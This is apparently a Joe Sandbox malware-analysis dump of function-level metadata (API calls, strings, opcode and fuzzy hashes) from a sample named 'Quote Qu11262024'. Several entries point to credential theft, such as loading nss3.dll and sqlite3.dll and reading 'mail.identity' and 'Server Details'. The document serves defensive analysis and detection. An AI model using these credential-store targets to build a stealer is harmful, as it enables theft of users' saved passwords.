                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4107816708-0
                                                                                                    • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                    • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                    • strftime.MSVCRT ref: 00411476
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1886415126-0
                                                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: >$>$>
                                                                                                    • API String ID: 39653677-3911187716
                                                                                                    • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                    • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: C@$mail.identity
                                                                                                    • API String ID: 1439213657-721921413
                                                                                                    • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                    • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                    • String ID: Ul@
                                                                                                    • API String ID: 270934217-715280498
                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                    APIs
                                                                                                      • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                    Strings
                                                                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                    • String ID: recovered %d pages from %s
                                                                                                    • API String ID: 985450955-1623757624
                                                                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _ultoasprintf
                                                                                                    • String ID: %s %s %s
                                                                                                    • API String ID: 432394123-3850900253
                                                                                                    • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                    • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                    • String ID: menu_%d
                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _msizerealloc
                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                    • strrchr.MSVCRT ref: 00409808
                                                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                    • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                    • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                    • String ID: sqlite3.dll
                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                    • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                    • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                    • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                    • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID: A4@$Server Details
                                                                                                    • API String ID: 1096422788-4071850762
                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                    • memset.MSVCRT ref: 0042C932
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040849A
                                                                                                    • memset.MSVCRT ref: 004084D2
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,75B4EB20,?,00000000), ref: 0040858F
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,75B4EB20,?,00000000), ref: 004085BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3110682361-0
                                                                                                    • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                    • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3510742995-0
                                                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8